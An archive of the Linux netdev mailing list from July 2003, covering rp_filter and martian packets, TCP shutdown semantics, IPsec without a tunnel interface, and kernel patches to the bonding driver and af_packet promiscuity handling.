From Niklas.Edmundsson@hpc2n.umu.se Tue Jul 1 00:37:31 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 01 Jul 2003 00:37:51 -0700 (PDT) Received: from tekla.ing.umu.se (root@tekla.ing.umu.se [130.239.117.80]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h617bS2x004363 for ; Tue, 1 Jul 2003 00:37:30 -0700 Received: from tekla.ing.umu.se (nikke@tekla.ing.umu.se [130.239.117.80]) by tekla.ing.umu.se (8.12.3/8.12.3/Debian-6.4) with ESMTP id h617bQ0j006731 for ; Tue, 1 Jul 2003 09:37:27 +0200 Date: Tue, 1 Jul 2003 09:37:26 +0200 (CEST) From: Niklas Edmundsson X-X-Sender: nikke@tekla.ing.umu.se To: netdev@oss.sgi.com Subject: martian packet checks breaks multi-homing Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3703 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: Niklas.Edmundsson@hpc2n.umu.se Precedence: bulk X-list: netdev Hi! We are setting up a multi homed server (currently running Linux 2.4.18) connected to several physical networks (due to the fact that the server is a dhcp server too). All clients talks to the main interface on the machine, routing is done by the network equipment. The problem is that when a client tries to talk to the main interface of the server (not on the same network), the server tags the packets as martian source and discards them! It's a perfectly valid packet since the client is not even aware of the servers extra interface on the network at this point and thus talks to the main interface via the default gateway and the normal routing on the campus network. This feature is desirable if you are doing some sort of routing or firewalling when there are no reason to talk to the other interface, but when doing multi-homing it's not what you want if you have an environment where clients talks to a main interface of a machine to establish communication (due to higher bandwidth or other reasons). I haven't even been able to find a way to disable or circumvent the check other than edit the source (fib_validate_source() is rather hard to read by the way). It would be nice if there existed a runtime way to disable it. I have done this setup a number of times using Solaris and AIX boxes, and it's a simple thing that really ought to work... If things are unclear or I have forgotten/missed something just tell me so and I'll try to clarify. /Nikke -- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Niklas Edmundsson, Admin @ {acc,hpc2n,ing}.umu.se | nikke@hpc2n.umu.se --------------------------------------------------------------------------- Egotist: Thinks he's in the groove when he's in a rut =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= From nikke@ing.umu.se Tue Jul 1 02:22:53 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 01 Jul 2003 02:23:02 -0700 (PDT) Received: from tekla.ing.umu.se (root@tekla.ing.umu.se [130.239.117.80]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h619Mp2x014958 for ; Tue, 1 Jul 2003 02:22:52 -0700 Received: from tekla.ing.umu.se (nikke@tekla.ing.umu.se [130.239.117.80]) by tekla.ing.umu.se (8.12.3/8.12.3/Debian-6.4) with ESMTP id h619Mo0j009659 for ; Tue, 1 Jul 2003 11:22:50 +0200 Date: Tue, 1 Jul 2003 11:22:50 +0200 (CEST) From: Niklas Edmundsson To: netdev@oss.sgi.com Subject: Re: martian packet checks breaks multi-homing In-Reply-To: Message-ID: References: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3704 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: nikke@ing.umu.se Precedence: bulk X-list: netdev On Tue, 1 Jul 2003, Niklas Edmundsson wrote: > > Hi! > > We are setting up a multi homed server (currently running Linux > 2.4.18) connected to several physical networks (due to the fact that > the server is a dhcp server too). > I haven't even been able to find a way to disable or circumvent the > check other than edit the source (fib_validate_source() is rather hard > to read by the way). It would be nice if there existed a runtime way > to disable it. Ignore me. Just after I sent this mail I found /proc/sys/net/ipv4/conf/*/rp_filter which solves all my problems. Sorry for the inconvenience. /Nikke - spanks the paranoid debian startup scripts a bit. -- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Niklas Edmundsson, Admin @ {acc,hpc2n,ing}.umu.se | nikke@ing.umu.se --------------------------------------------------------------------------- There once was a man from Nantucket.You've been talking to Garibaldi! =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= From srompf@barkeeper.isg.de Tue Jul 1 02:51:41 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 01 Jul 2003 02:51:51 -0700 (PDT) Received: from mail.isg.de (rzfoobar.is-asp.com [217.11.194.155]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h619pU2x016820 for ; Tue, 1 Jul 2003 02:51:31 -0700 Received: from barkeeper.isg.de (barkeeper.frankfurter-softwarefabrik.de [192.168.6.182]) by mail.isg.de (Postfix) with ESMTP id 6D1C51312C1E; Tue, 1 Jul 2003 11:11:27 +0200 (CEST) Received: from localhost (localhost [[UNIX: localhost]]) by barkeeper.isg.de (8.9.3/8.9.3) id LAA00936; Tue, 1 Jul 2003 11:11:26 +0200 From: Stefan Rompf To: Niklas Edmundsson , netdev@oss.sgi.com Subject: Re: martian packet checks breaks multi-homing Date: Tue, 1 Jul 2003 11:11:05 +0200 User-Agent: KMail/1.5.9.1i References: In-Reply-To: MIME-Version: 1.0 Content-Disposition: inline Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit Message-Id: <200307011111.26762.srompf@isg.de> X-archive-position: 3705 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: srompf@isg.de Precedence: bulk X-list: netdev Am Dienstag, 1. Juli 2003 09:37 schrieb Niklas Edmundsson: > The problem is that when a client tries to talk to the main interface > of the server (not on the same network), the server tags the packets > as martian source and discards them! It's a perfectly valid packet > If things are unclear or I have forgotten/missed something just tell > me so and I'll try to clarify. Have a look at linux/Documentation/networking/ip-sysctl.txt, rp_filter Stefan -- "doesn't work" is not a magic word to explain everything. From mtk-lists@gmx.net Tue Jul 1 04:23:57 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 01 Jul 2003 04:24:04 -0700 (PDT) Received: from mx0.gmx.net (mx0.gmx.net [213.165.64.100]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h61BNt2x020920 for ; Tue, 1 Jul 2003 04:23:56 -0700 Received: (qmail 7717 invoked by uid 0); 1 Jul 2003 11:23:49 -0000 Date: Tue, 1 Jul 2003 13:23:49 +0200 (MEST) From: mtk-lists@gmx.net To: netdev@oss.sgi.com MIME-Version: 1.0 Subject: shutdown() and SHUT_RD on TCP sockets - broken? X-Priority: 3 (Normal) X-Authenticated-Sender: #0018454895@gmx.net X-Authenticated-IP: [212.18.21.202] Message-ID: <14321.1057058629@www1.gmx.net> X-Mailer: WWW-Mail 1.6 (Global Message Exchange) X-Flags: 0001 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-archive-position: 3706 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mtk-lists@gmx.net Precedence: bulk X-list: netdev Hello, I've done quite some searching, but have so far not found an answer to the question of why does the behaviour described below occur on Linux... According to SUSv3, if we perform a shutdown(fd, SHUT_RD) on a socket, then further reads on that socket should be disabled. In the AF_UNIX domain, all is fine -- things operate as I expect. However, for TCP sockets, things are different (tested on 2.2.14, and 2.4.20): 1. If we perform a read() on the socket and there is no data, then 0 (EOF) is (immediately) returned. (This is what I expected.) 2. However, the peer can still write() to the socket, and afterwards we can read() that data from the socket, even though the reading half of the socket should be shut down. Instead of this behaviour, I expected the read() to continue to return 0 as in point 1. This is what we see for example in FreeBSD 4.8, Tru64 5.1B, and HP/UX 11. I thought that most implementations (other than Linux) did things this way, but I've just now gone and tested things on Solaris 8, and it seems to behave in the same way as Linux. I've read the relevant source code to confirm the anomalous behaviour described here. But, why do things happen in this way on Linux? 3. (A side point.) Looking at Stevens UNPv1, p161, there is a statement that after a SHUT_RD, "any data for a TCP socket is acknowledged and then silently discarded". This implies to me that the sender could keep on writing to the socket and never block. However, on Linux, if the peer keeps sending to a socket, then eventually (the channel is filled and) it blocks. I see that this also occurs on FreeBSD 4.8, Tru64 5.1B, HP/UX 11 and Solaris 8. Have I misunderstood Stevens, or has something changed since the implementation he described (or was his statement wrong)? (In the AF_UNIX domain on Linux, the peer gets SIGPIPE/EPIPE if it keeps writing after a local SHUT_RD.) Thanks Michael -- +++ GMX - Mail, Messaging & more http://www.gmx.net +++ Bitte lächeln! Fotogalerie online mit GMX ohne eigene Homepage! From ahu@outpost.ds9a.nl Tue Jul 1 06:27:26 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 01 Jul 2003 06:27:45 -0700 (PDT) Received: from outpost.ds9a.nl (postfix@outpost.ds9a.nl [213.244.168.210]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h61DRF2x031102 for ; Tue, 1 Jul 2003 06:27:15 -0700 Received: by outpost.ds9a.nl (Postfix, from userid 1000) id D904440F5; Tue, 1 Jul 2003 14:58:08 +0200 (CEST) Date: Tue, 1 Jul 2003 14:58:08 +0200 From: bert hubert To: Andreas Jellinghaus Cc: "netdev@oss.sgi.com" Subject: Re: ipsec without interface Message-ID: <20030701125808.GA19408@outpost.ds9a.nl> Mail-Followup-To: bert hubert , Andreas Jellinghaus , "netdev@oss.sgi.com" References: <1054235787.605.21.camel@simulacron> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <1054235787.605.21.camel@simulacron> User-Agent: Mutt/1.3.28i X-archive-position: 3707 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: ahu@ds9a.nl Precedence: bulk X-list: netdev On Thu, May 29, 2003 at 09:16:27PM +0200, Andreas Jellinghaus wrote: > sure, the simple configurations work fine with kernel 2.5.* ipsec. > But I miss the interface and things I did with it. How are these > setups supposed to work without an interface? > > a) in iptables allow everything coming from ipsec0, > allow only ssh and ipsec on eth0. iptables can filter on ESP/AH presence. > b) source address selection. put the default route on ipsec0, Do you need a separate source address? -- http://www.PowerDNS.com Open source, database driven DNS Software http://lartc.org Linux Advanced Routing & Traffic Control HOWTO From aj@dungeon.inka.de Tue Jul 1 06:31:33 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 01 Jul 2003 06:31:49 -0700 (PDT) Received: from mail.inka.de (mail@quechua.inka.de [193.197.184.2]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h61DVW2x031439 for ; Tue, 1 Jul 2003 06:31:33 -0700 Received: from dungeon.inka.de (uucp@[127.0.0.1]) by mail.inka.de with uucp (rmailwrap 0.5) id 19XLEI-0005f6-00; Tue, 01 Jul 2003 15:31:30 +0200 Received: from [192.168.3.1] (unknown [192.168.3.1]) by dungeon.inka.de (Postfix) with ESMTP id F11C421210; Tue, 1 Jul 2003 15:31:24 +0200 (CEST) Subject: Re: ipsec without interface From: Andreas Jellinghaus To: bert hubert Cc: "netdev@oss.sgi.com" In-Reply-To: <20030701125808.GA19408@outpost.ds9a.nl> References: <1054235787.605.21.camel@simulacron> <20030701125808.GA19408@outpost.ds9a.nl> Content-Type: text/plain Message-Id: <1057066404.4054.9.camel@simulacron> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.4.0 Date: 01 Jul 2003 15:33:24 +0200 Content-Transfer-Encoding: 7bit X-archive-position: 3708 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: aj@dungeon.inka.de Precedence: bulk X-list: netdev On Tue, 2003-07-01 at 14:58, bert hubert wrote: > On Thu, May 29, 2003 at 09:16:27PM +0200, Andreas Jellinghaus wrote: > > sure, the simple configurations work fine with kernel 2.5.* ipsec. > > But I miss the interface and things I did with it. How are these > > setups supposed to work without an interface? > > > > a) in iptables allow everything coming from ipsec0, > > allow only ssh and ipsec on eth0. > > iptables can filter on ESP/AH presence. the packet is seen once as ESP/AH and once as normal (e.g. TCP) packet. where is the connection? how can you see that a packet came in first as ESP/AH packet and was then decrypted, and did not came in without ipsec? with freeswan that was easy: drop everything, unless it is from interface ipsec0. And you always new, packets from ipsec0 came in with valid ipsec encryption, that was easy to make sure. and now? use fwmark? even if that works, its not as easy. > > > b) source address selection. put the default route on ipsec0, > > Do you need a separate source address? I'm a "road warrior", so the local wireless lan gives me a 192.168.* address. For my ipsec tunnel to $company gateway I need get an official address assigned, so I can use that to access the company network, or even the internet (if I don't trust the local network, and don't want unencrypted connections to the internet). I think such a setup will be quite common. local lan some nat company gateway 192.168.0.* <-> 192.168.0.1 <-> 1.2.3.4 ipsec tunnel 1.2.3.5 <-> 1.2.3.4 connetion will use 1.2.3.5 <-> 1.2.3.80 (e.g. company file server, allowing access from 1.2.3.*). ip route del default ip route add default gw 192.168.0.1 src 1.2.3.5 yes, that works. but it's not nice. also company getway needs a ip route add 1.2.3.5 dev eth0/1/2/whatever even though no packet to "1.2.3.5" will ever be on any wire - the packet will be alway encrypted and have a final ip address somewhere in the internet or wireless network. hmm. I haven't tried to use an explicit ipip tunnel. did anyone use ESP in transport mode to encrypt packets of an IPIP tunnel? that might help me. Regards, Andreas From shmulik.hen@intel.com Tue Jul 1 06:44:18 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 01 Jul 2003 06:44:39 -0700 (PDT) Received: from hermes.fm.intel.com (fmr01.intel.com [192.55.52.18]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h61DiH2x031807 for ; Tue, 1 Jul 2003 06:44:18 -0700 Received: from petasus.fm.intel.com (petasus.fm.intel.com [10.1.192.37]) by hermes.fm.intel.com (8.11.6p2/8.11.6/d: outer.mc,v 1.66 2003/05/22 21:17:36 rfjohns1 Exp $) with ESMTP id h61DdQM00581 for ; Tue, 1 Jul 2003 13:39:26 GMT Received: from fmsmsxvs041.fm.intel.com (fmsmsxvs041.fm.intel.com [132.233.42.126]) by petasus.fm.intel.com (8.11.6p2/8.11.6/d: inner.mc,v 1.35 2003/05/22 21:18:01 rfjohns1 Exp $) with SMTP id h61DbKa02239 for ; Tue, 1 Jul 2003 13:37:20 GMT Received: from jrslxjul1.npdj.intel.com ([10.12.254.186]) by fmsmsxvs041.fm.intel.com (NAVGW 2.5.2.11) with SMTP id M2003070106403620572 ; Tue, 01 Jul 2003 06:40:38 -0700 Date: Tue, 1 Jul 2003 16:44:11 +0300 (IDT) From: Shmulik Hen X-X-Sender: Reply-To: Shmulik Hen To: bond-devel , "Chad N. Tindel" , Jay Vosburgh , Jeff Garzik , linux-netdev cc: Amir Noam , Noam Marom , Shmulik Hen , Tsippy Mendelson Subject: [patch][bonding] Fix change active for ALB/TLB Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3709 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shmulik.hen@intel.com Precedence: bulk X-list: netdev Hi, The following patch fixes bonding's change active interface operation for ALB/TLB modes. It used to incorrectly set the old active interface's state to BACKUP (which is required only for active-backup mode) and would cause that slave not to take part in load sharing. It should be applied on latest net-drivers-2.4 BK tree. -- | Shmulik Hen | | Israel Design Center (Jerusalem) | | LAN Access Division | | Intel Communications Group, Intel corp. | diff -Nuarp linux-2.4.22-pre1-netdrvr1/drivers/net/bonding/bond_main.c linux-2.4.22-pre1-netdrvr1-devel/drivers/net/bonding/bond_main.c --- linux-2.4.22-pre1-netdrvr1/drivers/net/bonding/bond_main.c Mon Jun 30 15:29:56 2003 +++ linux-2.4.22-pre1-netdrvr1-devel/drivers/net/bonding/bond_main.c Mon Jun 30 15:29:57 2003 @@ -385,6 +385,9 @@ * - In conjunction with fix for ifenslave -c, in * bond_change_active(), changing to the already active slave * is no longer an error (it successfully does nothing). + * + * 2003/06/30 - Amir Noam + * - Fixed bond_change_active() for ALB/TLB modes. */ #include @@ -429,8 +432,8 @@ #include "bond_3ad.h" #include "bond_alb.h" -#define DRV_VERSION "2.2.13" -#define DRV_RELDATE "June 25, 2003" +#define DRV_VERSION "2.2.14" +#define DRV_RELDATE "June 30, 2003" #define DRV_NAME "bonding" #define DRV_DESCRIPTION "Ethernet Channel Bonding Driver" @@ -1761,8 +1764,11 @@ static int bond_change_active(struct net (oldactive != NULL)&& (newactive->link == BOND_LINK_UP)&& IS_UP(newactive->dev)) { - bond_set_slave_inactive_flags(oldactive); - bond_set_slave_active_flags(newactive); + if (bond_mode == BOND_MODE_ACTIVEBACKUP) { + bond_set_slave_inactive_flags(oldactive); + bond_set_slave_active_flags(newactive); + } + bond_mc_update(bond, newactive, oldactive); bond_assign_current_slave(bond, newactive); printk("%s : activate %s(old : %s)\n", From jmorris@intercode.com.au Tue Jul 1 07:00:31 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 01 Jul 2003 07:00:43 -0700 (PDT) Received: from blackbird.intercode.com.au (IDENT:vrOxXT2uj4iTAwgLdo5TiySDE/u7yS28@blackbird.intercode.com.au [203.32.101.10]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h61E0S2x003973 for ; Tue, 1 Jul 2003 07:00:30 -0700 Received: from excalibur.intercode.com.au (excalibur.intercode.com.au [203.32.101.12]) by blackbird.intercode.com.au (8.11.6p2/8.9.3) with ESMTP id h61E0Er07026; Wed, 2 Jul 2003 00:00:14 +1000 Date: Wed, 2 Jul 2003 00:00:13 +1000 (EST) From: James Morris To: Andreas Jellinghaus cc: bert hubert , "netdev@oss.sgi.com" Subject: Re: ipsec without interface In-Reply-To: <1057066404.4054.9.camel@simulacron> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3710 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jmorris@intercode.com.au Precedence: bulk X-list: netdev On 1 Jul 2003, Andreas Jellinghaus wrote: > hmm. I haven't tried to use an explicit ipip tunnel. > did anyone use ESP in transport mode to encrypt packets > of an IPIP tunnel? that might help me. It's known to work on a gre tunnel (if you manually adjust the mtu), so ipip probably works. - James -- James Morris From ja@ssi.bg Tue Jul 1 14:53:44 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 01 Jul 2003 14:53:51 -0700 (PDT) Received: from u.domain.uli (ja.mac.ssi.bg [217.79.71.194]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h61LrZ2x015425 for ; Tue, 1 Jul 2003 14:53:40 -0700 Received: from localhost (IDENT:ja@localhost [127.0.0.1]) by u.domain.uli (8.11.6/8.11.6) with ESMTP id h61LvLG02312; Wed, 2 Jul 2003 00:57:21 +0300 Date: Wed, 2 Jul 2003 00:57:21 +0300 (EEST) From: Julian Anastasov X-X-Sender: ja@u.domain.uli To: Ben Greear cc: netdev@oss.sgi.com Subject: Re: send-to-self (was Re: routing bug report for 2.4) In-Reply-To: <3EFFEDD7.5020205@candelatech.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3711 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: ja@ssi.bg Precedence: bulk X-list: netdev Hello, On Mon, 30 Jun 2003, Ben Greear wrote: > You should be able to easily test most of the changes your code > if you have a machine with two ethernet interfaces and a loopback > cable... ok, tested the 2.5 version, the patch files are updated: http://www.ssi.bg/~ja/#loop - added missing dev_put on ENETDOWN - removed the checks that ignore oif for local routes as Alexey suggests I have tried simple tests: ICMP, telnet. What I see is that the 2.5 rt_set_nexthop() does not set sysctl_ip_default_ttl if res->fi is NULL and that causes the icmp echo packets to use ttl=0. May be there are still some noisy places like arp_set_predefined, it will need further investigation. I'm stopping here, for now. > My requirements are: > > 1) Both ethernet ports communicate over the exernal link, UDP & IP traffic. Done > Third-party programs if possible, thus I set the flag on the interface in > my patch, not on an individual socket, though I do have to BINDTODEVICE and > policy-base base route to get things working right... Now you have 2 options: - bind to src IP: the app needs to be aware for that - ip route replace local IP2 dev DEV2 ... src IP1 table local: the app does not need to be aware to use this feature Now using BINDTODEVICE can cause problems with this feature, because we do not ignore oif for local destinations, you risk to miss the local route and arp_filter to break the things or worse (not tested) > 1b) Allow both same-subnet comm (eth1 & eth2 are on same subnet), and also > routed traffic (eth1 & eth2 have their own default router, similar to the > previously discussed routing setup) all other routes remain unchanged, I hope > 2) Allow normal non-looped communication on the ports, including policy-based routing > based on source addr. hm, you better know what you mean. As expected, this feature has its drawbacks. The safe way is to teach some apps to bind to IP1 and the apps that are unaware for these loops to use the prefsrc and thus to use lo. There is no much space for improvement here but I'm open for suggestions. > Thanks, > Ben Regards -- Julian Anastasov From greearb@candelatech.com Tue Jul 1 15:07:18 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 01 Jul 2003 15:07:23 -0700 (PDT) Received: from grok.yi.org (evrtwa1-ar2-4-33-045-074.evrtwa1.dsl-verizon.net [4.33.45.74]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h61M7I2x015866 for ; Tue, 1 Jul 2003 15:07:18 -0700 Received: from candelatech.com (localhost.localdomain [127.0.0.1]) by grok.yi.org (8.12.8/8.12.8) with ESMTP id h61M7CKk018766; Tue, 1 Jul 2003 15:07:12 -0700 Message-ID: <3F020610.2080109@candelatech.com> Date: Tue, 01 Jul 2003 15:07:12 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Julian Anastasov CC: netdev@oss.sgi.com Subject: Re: send-to-self (was Re: routing bug report for 2.4) References: In-Reply-To: Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3712 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev Julian Anastasov wrote: > Hello, > > On Mon, 30 Jun 2003, Ben Greear wrote: > > >>You should be able to easily test most of the changes your code >>if you have a machine with two ethernet interfaces and a loopback >>cable... > > > ok, tested the 2.5 version, the patch files are updated: > > http://www.ssi.bg/~ja/#loop > > - added missing dev_put on ENETDOWN > - removed the checks that ignore oif for local routes as Alexey suggests > > I have tried simple tests: ICMP, telnet. What I see > is that the 2.5 rt_set_nexthop() does not set sysctl_ip_default_ttl if > res->fi is NULL and that causes the icmp echo packets to use > ttl=0. May be there are still some noisy places like arp_set_predefined, > it will need further investigation. I'm stopping here, for now. How did you get telnet to bind to a particular local interface? Also, what ping syntax did you use? Did you have to modify either of these applications to get them to work? I looked at the patch...but don't have a good enough grasp of the routing code to provide a useful critique. I believe my patch _is_ smaller though ;) Thanks, Ben > > >>My requirements are: >> >>1) Both ethernet ports communicate over the exernal link, UDP & IP traffic. > > > Done > > >> Third-party programs if possible, thus I set the flag on the interface in >> my patch, not on an individual socket, though I do have to BINDTODEVICE and >> policy-base base route to get things working right... > > > Now you have 2 options: > > - bind to src IP: the app needs to be aware for that > > - ip route replace local IP2 dev DEV2 ... src IP1 table local: the app > does not need to be aware to use this feature > > Now using BINDTODEVICE can cause problems with this feature, > because we do not ignore oif for local destinations, you risk to > miss the local route and arp_filter to break the things or worse (not > tested) > > >>1b) Allow both same-subnet comm (eth1 & eth2 are on same subnet), and also >> routed traffic (eth1 & eth2 have their own default router, similar to the >> previously discussed routing setup) > > > all other routes remain unchanged, I hope > > >>2) Allow normal non-looped communication on the ports, including policy-based routing >> based on source addr. > > > hm, you better know what you mean. As expected, this feature > has its drawbacks. The safe way is to teach some apps to bind to > IP1 and the apps that are unaware for these loops to use the prefsrc > and thus to use lo. There is no much space for improvement here but > I'm open for suggestions. > > >>Thanks, >>Ben > > > Regards > > -- > Julian Anastasov > -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From linux-netdev@gmane.org Tue Jul 1 15:17:19 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 01 Jul 2003 15:17:26 -0700 (PDT) Received: from main.gmane.org (main.gmane.org [80.91.224.249]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h61MHH2x016286 for ; Tue, 1 Jul 2003 15:17:18 -0700 Received: from list by main.gmane.org with local (Exim 3.35 #1 (Debian)) id 19XT27-0006BX-00 for ; Tue, 01 Jul 2003 23:51:27 +0200 X-Injected-Via-Gmane: http://gmane.org/ To: netdev@oss.sgi.com Received: from news by main.gmane.org with local (Exim 3.35 #1 (Debian)) id 19XT24-0006B5-00 for ; Tue, 01 Jul 2003 23:51:24 +0200 From: Jason Lunz Subject: [PATCH 2.4.22-bk] dev->promiscuity refcounting broken in af_packet.c Date: Tue, 1 Jul 2003 21:51:23 +0000 (UTC) Organization: PBR Streetgang Lines: 99 Message-ID: References: Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Complaints-To: usenet@main.gmane.org User-Agent: slrn/0.9.7.4 (Linux) X-archive-position: 3713 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: lunz@falooley.org Precedence: bulk X-list: netdev niz@vencraft.com said: > A number of people have mentioned that they get a weird situation > where when they *start* a program that does promiscuous network reads > (with, say, ‘tcpdump –i eth0’). They then get a kernel message > “left promiscuous mode” when the program starts and the message > “entered promiscuous mode” when it exits – the exact opposite of > what should happen. Thanks for finding this! This has been happening to me for over a year, but always so rarely that I never bothered to really track it down. Your patch isn't really correct, though. Aside from the whitespace damage, it doesn't really address the problem. Clamping the refcount at zero only stops the bleeding. The problem is that packet sockets are calling dev_set_promiscuity too many times. For example, if I take an unconfigured interface and do: halfoat:~ # ip link show eth1 9: eth1: mtu 1500 qdisc pfifo_fast qlen 100 link/ether 00:30:48:41:62:12 brd ff:ff:ff:ff:ff:ff halfoat:~ # ip link set up eth1 halfoat:~ # tcpdump -i eth1 & [1] 457 tcpdump: WARNING: eth1: no IPv4 address assigned tcpdump: listening on eth1 halfoat:~ # ip link set down eth1 tcpdump: pcap_loop: recvfrom: Network is down [1]+ Exit 1 tcpdump -i eth1 halfoat:~ # ip link show eth1 9: eth1: mtu 1500 qdisc pfifo_fast qlen 100 link/ether 00:30:48:41:62:12 brd ff:ff:ff:ff:ff:ff eth1 is now in promiscuous mode because dev->promiscuity is -1 (!= 0). When the interface goes down, dev_change_flags calls dev_close, which sends NETDEV_DOWN down the netdev notifier chain. Because tcpdump has a packet socket open, packet_notifier calls packet_dev_mclist -> packet_dev_mc -> dev_set_promiscuity. When tcpdump gets ENETDOWN, it aborts, closing the packet socket. af_packet.c's proto_ops->release cleanup method is packet_release. On close(), packet_release calls packet_flush_mclist, which again decrements dev->promiscuity, so when tcpdump exits, dev promiscuity is left at -1. I can't see any reason to be mucking about with the device promiscuity on NETDEV_DOWN and NETDEV_UP events in the first place. The attached patch seems to fix all the cases I can think of. It works properly in both of the above cases, and has also been verified to do the right thing with NETDEV_UNREGISTER events. Jason Index: linux-2.4/net/packet/af_packet.c =================================================================== RCS file: /home/cvs/linux-2.4/net/packet/af_packet.c,v retrieving revision 1.11 diff -u -p -r1.11 af_packet.c --- linux-2.4/net/packet/af_packet.c 12 Jun 2002 23:10:34 -0000 1.11 +++ linux-2.4/net/packet/af_packet.c 1 Jul 2003 20:17:51 -0000 @@ -1378,8 +1378,13 @@ static int packet_notifier(struct notifi po = sk->protinfo.af_packet; switch (msg) { - case NETDEV_DOWN: case NETDEV_UNREGISTER: +#ifdef CONFIG_PACKET_MULTICAST + if (po->mclist) + packet_dev_mclist(dev, po->mclist, -1); + // fallthrough +#endif + case NETDEV_DOWN: if (dev->ifindex == po->ifindex) { spin_lock(&po->bind_lock); if (po->running) { @@ -1396,10 +1401,6 @@ static int packet_notifier(struct notifi } spin_unlock(&po->bind_lock); } -#ifdef CONFIG_PACKET_MULTICAST - if (po->mclist) - packet_dev_mclist(dev, po->mclist, -1); -#endif break; case NETDEV_UP: spin_lock(&po->bind_lock); @@ -1409,10 +1410,6 @@ static int packet_notifier(struct notifi po->running = 1; } spin_unlock(&po->bind_lock); -#ifdef CONFIG_PACKET_MULTICAST - if (po->mclist) - packet_dev_mclist(dev, po->mclist, +1); -#endif break; } } From ja@ssi.bg Tue Jul 1 15:19:40 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 01 Jul 2003 15:19:43 -0700 (PDT) Received: from u.domain.uli (ja.mac.ssi.bg [217.79.71.194]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h61MJa2x016593 for ; Tue, 1 Jul 2003 15:19:38 -0700 Received: from localhost (IDENT:ja@localhost [127.0.0.1]) by u.domain.uli (8.11.6/8.11.6) with ESMTP id h61MNQG02379; Wed, 2 Jul 2003 01:23:26 +0300 Date: Wed, 2 Jul 2003 01:23:25 +0300 (EEST) From: Julian Anastasov X-X-Sender: ja@u.domain.uli To: Ben Greear cc: netdev@oss.sgi.com Subject: Re: send-to-self (was Re: routing bug report for 2.4) In-Reply-To: <3F020610.2080109@candelatech.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3714 